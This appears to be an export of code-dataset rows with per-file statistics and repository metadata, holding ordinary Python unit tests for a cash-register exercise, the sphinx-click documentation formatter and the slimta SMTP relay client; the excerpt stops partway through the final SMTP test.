| 0.754532
| 0
| 0
| 0.740741
| 0
| 0
| 0.203994
| 0.141557
| 0
| 0
| 0
| 0
| 0.54321
| 1
| 0.049383
| false
| 0
| 0.049383
| 0
| 0.098765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d912ba580ad2f966b87eb1035da93bc87a2fbf7
| 143
|
py
|
Python
|
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
# pylint: disable=wildcard-import
from my_library.dataset_readers import *
from my_library.models import *
from my_library.predictors import *
| 28.6
| 40
| 0.825175
| 20
| 143
| 5.7
| 0.55
| 0.263158
| 0.315789
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104895
| 143
| 4
| 41
| 35.75
| 0.890625
| 0.216783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5dd40b49e84477e27f1b1f0e593d072f76d11820
| 6,671
|
py
|
Python
|
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
import unittest
from kassapaate import Kassapaate
from maksukortti import Maksukortti
class TestKassapaate(unittest.TestCase):
def setUp(self):
self.kassapaate = Kassapaate()
self.maksukortti = Maksukortti(1000)
def test_luodun_paatteen_saldo_oikein(self):
balance = self.kassapaate.kassassa_rahaa
self.assertEqual(balance, 100000)
def test_luodun_paatteen_myynti_oikein(self):
sales = self.kassapaate.edulliset + self.kassapaate.maukkaat
self.assertEqual(sales, 0)
def test_edullisen_myynti_kateisella_kasvattaa_myyntia(self):
self.kassapaate.syo_edullisesti_kateisella(1000)
self.assertEqual(self.kassapaate.edulliset, 1)
def test_edullisen_myynti_ei_kasvata_myyntia_kun_raha_ei_riita(self):
self.kassapaate.syo_edullisesti_kateisella(10)
self.assertEqual(self.kassapaate.edulliset, 0)
def test_edullisen_myynti_kateisella_kasvattaa_kassaa(self):
self.kassapaate.syo_edullisesti_kateisella(1000)
self.assertEqual(self.kassapaate.kassassa_rahaa, 100240)
def test_edullisen_myynti_ei_kasvata_kassaa_kun_raha_ei_riita(self):
self.kassapaate.syo_edullisesti_kateisella(10)
self.assertEqual(self.kassapaate.kassassa_rahaa, 100000)
def test_edullisen_myynti_kateisella_vaihtoraha_oikein(self):
change = self.kassapaate.syo_edullisesti_kateisella(250)
self.assertEqual(change, 10)
def test_edullisen_myynti_kateisella_vaihtoraha_kun_raha_ei_riita(self):
change = self.kassapaate.syo_edullisesti_kateisella(230)
self.assertEqual(change, 230)
def test_maukkaan_myynti_kateisella_kasvattaa_myyntia(self):
self.kassapaate.syo_maukkaasti_kateisella(2000)
self.assertEqual(self.kassapaate.maukkaat, 1)
def test_maukkaan_myynti_ei_kasvata_myyntia_kun_raha_ei_riita(self):
self.kassapaate.syo_maukkaasti_kateisella(10)
self.assertEqual(self.kassapaate.maukkaat, 0)
def test_maukkaan_myynti_kateisella_kasvattaa_kassaa(self):
self.kassapaate.syo_maukkaasti_kateisella(2000)
self.assertEqual(self.kassapaate.kassassa_rahaa, 100400)
def test_maukkaan_myynti_ei_kasvata_kassaa_kun_raha_ei_riita(self):
self.kassapaate.syo_maukkaasti_kateisella(10)
self.assertEqual(self.kassapaate.kassassa_rahaa, 100000)
def test_maukkaan_myynti_kateisella_vaihtoraha_oikein(self):
change = self.kassapaate.syo_maukkaasti_kateisella(410)
self.assertEqual(change, 10)
def test_maukkaan_myynti_kateisella_vaihtoraha_kun_raha_ei_riita(self):
change = self.kassapaate.syo_maukkaasti_kateisella(230)
self.assertEqual(change, 230)
# Kortti edullinen
def test_edullisen_myynti_kortilla_ei_muuta_kassaa(self):
self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
balance = self.kassapaate.kassassa_rahaa
self.assertEqual(balance, 100000)
def test_edullisen_myynti_kortilla_kasvattaa_myyntia(self):
self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
self.assertEqual(self.kassapaate.edulliset, 1)
def test_edullisen_myynti_kortilla_ei_kasvata_myyntia_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
self.assertEqual(self.kassapaate.edulliset, 0)
def test_edullisen_myynti_kortilla_veloitetaan_kortilta(self):
self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
self.assertEqual(str(self.maksukortti), "saldo: 7.6")
def test_edullisen_myynti_kortilla_ei_veloitusta_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
self.assertEqual(str(self.maksukortti), "saldo: 10.0")
def test_edullisen_myynti_kortilla_palautusarvo(self):
return_value = self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
self.assertEqual(return_value, True)
def test_edullisen_myynti_kortilla_palautusarvo_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
return_value = self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
self.assertEqual(return_value, False)
# Kortti maukas
def test_maukkaan_myynti_kortilla_ei_muuta_kassaa(self):
self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
balance = self.kassapaate.kassassa_rahaa
self.assertEqual(balance, 100000)
def test_maukkaan_myynti_kortilla_kasvattaa_myyntia(self):
self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
self.assertEqual(self.kassapaate.maukkaat, 1)
def test_maukkaan_myynti_kortilla_ei_kasvata_myyntia_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
self.assertEqual(self.kassapaate.maukkaat, 0)
def test_maukkaan_myynti_kortilla_veloitetaan_kortilta(self):
self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
self.assertEqual(str(self.maksukortti), "saldo: 6.0")
def test_maukkaan_myynti_kortilla_ei_veloitusta_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
self.assertEqual(str(self.maksukortti), "saldo: 10.0")
def test_maukkaan_myynti_kortilla_palautusarvo(self):
return_value = self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
self.assertEqual(return_value, True)
def test_maukkaan_myynti_kortilla_palautusarvo_kun_raha_ei_riita(self):
maksukortti_low_balance = Maksukortti(1)
return_value = self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
self.assertEqual(return_value, False)
# Lataus
def test_kortin_lataus_kasvattaa_kassaa(self):
maksukortti_temp = Maksukortti(1000)
self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, 1000)
balance = self.kassapaate.kassassa_rahaa
self.assertEqual(balance, 101000)
def test_kortin_lataus_siirtyy_kortille(self):
maksukortti_temp = Maksukortti(1000)
self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, 1000)
self.assertEqual(str(maksukortti_temp), "saldo: 20.0")
# Paluuarvo
def test_negatiivinen_lataus_kortille(self):
maksukortti_temp = Maksukortti(1000)
return_value = self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, -500)
self.assertEqual(str(maksukortti_temp), "saldo: 10.0")
| 43.03871
| 88
| 0.76945
| 781
| 6,671
| 6.185659
| 0.101152
| 0.139102
| 0.091492
| 0.060857
| 0.899193
| 0.895674
| 0.803974
| 0.773753
| 0.710619
| 0.621817
| 0
| 0.02707
| 0.158297
| 6,671
| 154
| 89
| 43.318182
| 0.833304
| 0.007045
| 0
| 0.5
| 0
| 0
| 0.009674
| 0
| 0
| 0
| 0
| 0
| 0.276786
| 1
| 0.285714
| false
| 0
| 0.026786
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b908798999c7329290d0358d6b38412fb7991b04
| 9,720
|
py
|
Python
|
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
import textwrap
import unittest
import click
from sphinx_click import ext
class CommandTestCase(unittest.TestCase):
def test_no_parameters(self):
"""Validate a `click.Command` with no parameters.
This exercises the code paths for a command with *no* arguments, *no*
options and *no* environment variables.
"""
@click.command()
def foobar():
"""A sample command."""
pass
ctx = click.Context(foobar, info_name='foobar')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command.
.. program:: foobar
.. code-block:: shell
foobar [OPTIONS]
""").lstrip(), '\n'.join(output))
def test_basic_parameters(self):
"""Validate a combination of parameters.
This exercises the code paths for a command with arguments, options and
environment variables.
"""
@click.command()
@click.option('--param', envvar='PARAM', help='A sample option')
@click.argument('ARG', envvar='ARG')
def foobar(bar):
"""A sample command."""
pass
ctx = click.Context(foobar, info_name='foobar')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command.
.. program:: foobar
.. code-block:: shell
foobar [OPTIONS] ARG
.. rubric:: Options
.. option:: --param <param>
A sample option
.. rubric:: Arguments
.. option:: ARG
Required argument
.. rubric:: Environment variables
.. _foobar-param-PARAM:
.. envvar:: PARAM
:noindex:
Provide a default for :option:`--param`
.. _foobar-arg-ARG:
.. envvar:: ARG
:noindex:
Provide a default for :option:`ARG`
""").lstrip(), '\n'.join(output))
@unittest.skipIf(ext.CLICK_VERSION < (7, 0),
'The hidden flag was added in Click 7.0')
def test_hidden(self):
"""Validate a `click.Command` with the `hidden` flag."""
@click.command(hidden=True)
def foobar():
"""A sample command."""
pass
ctx = click.Context(foobar, info_name='foobar')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual('', '\n'.join(output))
class GroupTestCase(unittest.TestCase):
def test_no_parameters(self):
"""Validate a `click.Group` with no parameters.
This exercises the code paths for a group with *no* arguments, *no*
options and *no* environment variables.
"""
@click.group()
def cli():
"""A sample command group."""
pass
ctx = click.Context(cli, info_name='cli')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
""").lstrip(), '\n'.join(output))
def test_basic_parameters(self):
"""Validate a combination of parameters.
This exercises the code paths for a group with arguments, options and
environment variables.
"""
@click.group()
@click.option('--param', envvar='PARAM', help='A sample option')
@click.argument('ARG', envvar='ARG')
def cli():
"""A sample command group."""
pass
ctx = click.Context(cli, info_name='cli')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] ARG COMMAND [ARGS]...
.. rubric:: Options
.. option:: --param <param>
A sample option
.. rubric:: Arguments
.. option:: ARG
Required argument
.. rubric:: Environment variables
.. _cli-param-PARAM:
.. envvar:: PARAM
:noindex:
Provide a default for :option:`--param`
.. _cli-arg-ARG:
.. envvar:: ARG
:noindex:
Provide a default for :option:`ARG`
""").lstrip(), '\n'.join(output))
def test_no_line_wrapping(self):
r"""Validate behavior when a \b character is present.
https://click.palletsprojects.com/en/7.x/documentation/#preventing-rewrapping
"""
@click.group()
def cli():
"""A sample command group.
\b
This is
a paragraph
without rewrapping.
And this is a paragraph
that will be rewrapped again.
"""
pass
ctx = click.Context(cli, info_name='cli')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command group.
| This is
| a paragraph
| without rewrapping.
And this is a paragraph
that will be rewrapped again.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
""").lstrip(), '\n'.join(output))
class NestedCommandsTestCase(unittest.TestCase):
@staticmethod
def _get_ctx():
@click.group()
def cli():
"""A sample command group."""
pass
@cli.command()
def hello():
"""A sample command."""
pass
return click.Context(cli, info_name='cli')
def test_hide_nested(self):
"""Validate a nested command without show_nested.
If we're not showing sub-commands separately, we should list them.
"""
ctx = self._get_ctx()
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
.. rubric:: Commands
.. object:: hello
A sample command.
""").lstrip(), '\n'.join(output))
def test_show_nested(self):
"""Validate a nested command with show_nested.
If we're not showing sub-commands separately, we should not list them.
"""
ctx = self._get_ctx()
output = list(ext._format_command(ctx, show_nested=True))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
""").lstrip(), '\n'.join(output))
class CommandFilterTestCase(unittest.TestCase):
@staticmethod
def _get_ctx():
@click.group()
def cli():
"""A sample command group."""
@cli.command()
def hello():
"""A sample command."""
@cli.command()
def world():
"""A world command."""
return click.Context(cli, info_name='cli')
def test_no_commands(self):
"""Validate an empty command group."""
ctx = self._get_ctx()
output = list(ext._format_command(ctx, show_nested=False, commands=''))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
""").lstrip(), '\n'.join(output))
def test_order_of_commands(self):
"""Validate the order of commands."""
ctx = self._get_ctx()
output = list(ext._format_command(ctx, show_nested=False,
commands='world, hello'))
self.assertEqual(
textwrap.dedent("""
A sample command group.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
.. rubric:: Commands
.. object:: world
A world command.
.. object:: hello
A sample command.
""").lstrip(), '\n'.join(output))
class CustomMultiCommandTestCase(unittest.TestCase):
def test_basics(self):
"""Validate a custom ``click.MultiCommand`` with no parameters.
This exercises the code paths to extract commands correctly from these
commands.
"""
@click.command()
def hello():
"""A sample command."""
@click.command()
def world():
"""A world command."""
class MyCLI(click.MultiCommand):
_command_mapping = {
'hello': hello,
'world': world,
}
def list_commands(self, ctx):
return ['hello', 'world']
def get_command(self, ctx, name):
return self._command_mapping[name]
cli = MyCLI(help='A sample custom multicommand.')
ctx = click.Context(cli, info_name='cli')
output = list(ext._format_command(ctx, show_nested=False))
self.assertEqual(
textwrap.dedent("""
A sample custom multicommand.
.. program:: cli
.. code-block:: shell
cli [OPTIONS] COMMAND [ARGS]...
.. rubric:: Commands
.. object:: hello
A sample command.
.. object:: world
A world command.
""").lstrip(), '\n'.join(output))
| 24.360902
| 85
| 0.535185
| 1,002
| 9,720
| 5.101796
| 0.135729
| 0.03971
| 0.062989
| 0.044601
| 0.816901
| 0.804382
| 0.765454
| 0.73572
| 0.720853
| 0.692293
| 0
| 0.000779
| 0.339609
| 9,720
| 398
| 86
| 24.422111
| 0.795607
| 0.160082
| 0
| 0.776256
| 0
| 0
| 0.398535
| 0
| 0
| 0
| 0
| 0
| 0.050228
| 1
| 0.127854
| false
| 0.03653
| 0.018265
| 0.009132
| 0.191781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8d8188be5011283a6e1b6267c00ec79002894e2
| 22,492
|
py
|
Python
|
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
from email.encoders import encode_base64
import unittest
from mox3.mox import MoxTestBase, IsA
from gevent import Timeout
from gevent.socket import socket, error as socket_error
from gevent.ssl import SSLContext
from gevent.event import AsyncResult
from slimta.util import pycompat
from slimta.util.deque import BlockingDeque
from slimta.smtp import ConnectionLost, SmtpError
from slimta.smtp.reply import Reply
from slimta.relay import TransientRelayError, PermanentRelayError
from slimta.relay.smtp.client import SmtpRelayClient
from slimta.envelope import Envelope
class TestSmtpRelayClient(MoxTestBase, unittest.TestCase):
def setUp(self):
super(TestSmtpRelayClient, self).setUp()
self.sock = self.mox.CreateMock(socket)
self.sock.fileno = lambda: -1
self.sock.getpeername = lambda: ('test', 0)
self.queue = self.mox.CreateMock(BlockingDeque)
self.context = self.mox.CreateMock(SSLContext)
self.context.session_stats = lambda: {}
def _socket_creator(self, address):
return self.sock
def test_connect(self):
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
def test_banner(self):
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.recv(IsA(int)).AndReturn(b'420 Not Welcome\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
client._banner()
with self.assertRaises(TransientRelayError):
client._banner()
def test_ehlo(self):
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 TEST\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'420 Goodbye\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
with self.assertRaises(TransientRelayError):
client._ehlo()
def test_starttls(self):
self.sock.sendall(b'STARTTLS\r\n')
self.sock.recv(IsA(int)).AndReturn(b'220 Go ahead\r\n')
self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
self.sock.sendall(b'STARTTLS\r\n')
self.sock.recv(IsA(int)).AndReturn(b'420 Stop\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, tls_required=True)
client._connect()
client._starttls()
with self.assertRaises(TransientRelayError):
client._starttls()
def test_handshake_tls_immediately(self):
self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Hello\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, tls_immediately=True, ehlo_as='there')
client._connect()
client._handshake()
def test_handshake_starttls(self):
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 STARTTLS\r\n')
self.sock.sendall(b'STARTTLS\r\n')
self.sock.recv(IsA(int)).AndReturn(b'220 Go ahead\r\n')
self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Hello\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, ehlo_as='there')
client._connect()
client._handshake()
def test_handshake_authenticate(self):
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
self.sock.recv(IsA(int)).AndReturn(b'235 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=('test@example.com', 'passwd'), ehlo_as='there')
client._connect()
client._handshake()
def test_handshake_authenticate_callable(self):
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
self.sock.recv(IsA(int)).AndReturn(b'235 Ok\r\n')
self.mox.ReplayAll()
def yield_creds():
yield 'test@example.com'
yield 'passwd'
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=yield_creds, ehlo_as='there')
client._connect()
client._handshake()
def test_rset(self):
self.sock.sendall(b'RSET\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
client._rset()
def test_handshake_authenticate_badcreds(self):
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
self.sock.recv(IsA(int)).AndReturn(b'535 Nope!\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=('test@example.com', 'passwd'), ehlo_as='there')
client._connect()
with self.assertRaises(PermanentRelayError):
client._handshake()
def test_mailfrom(self):
self.sock.sendall(b'MAIL FROM:<sender>\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'MAIL FROM:<sender>\r\n')
self.sock.recv(IsA(int)).AndReturn(b'550 Not Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
client._mailfrom('sender')
with self.assertRaises(PermanentRelayError):
client._mailfrom('sender')
def test_rcptto(self):
self.sock.sendall(b'RCPT TO:<recipient>\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
client._rcptto('recipient')
def test_send_message_data(self):
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'550 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
client._connect()
client._send_message_data(env)
with self.assertRaises(PermanentRelayError):
client._send_message_data(env)
def test_deliver(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 8BITMIME\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'RCPT TO:<rcpt@example.com>\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'DATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'354 Go ahead\r\n')
self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test \x81\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
client._deliver(result, env)
self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
def test_deliver_badpipeline(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'550 Not ok\r\n250 Ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'.\r\nRSET\r\n')
self.sock.recv(IsA(int)).AndReturn(b'550 Yikes\r\n250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
client._deliver(result, env)
with self.assertRaises(PermanentRelayError):
result.get_nowait()
def test_deliver_baddata(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'450 Yikes\r\n')
self.sock.sendall(b'RSET\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
client._deliver(result, env)
with self.assertRaises(TransientRelayError):
result.get_nowait()
def test_deliver_badrcpts(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n550 Not ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'.\r\nRSET\r\n')
self.sock.recv(IsA(int)).AndReturn(b'550 Yikes\r\n250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
client._deliver(result, env)
with self.assertRaises(PermanentRelayError):
result.get_nowait()
def test_deliver_rset_exception(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n450 No!\r\n')
self.sock.sendall(b'RSET\r\n')
self.sock.recv(IsA(int)).AndRaise(ConnectionLost)
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
with self.assertRaises(ConnectionLost):
client._deliver(result, env)
with self.assertRaises(TransientRelayError):
result.get_nowait()
def test_deliver_conversion(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
self.sock.sendall(b'EHLO there\r\n')
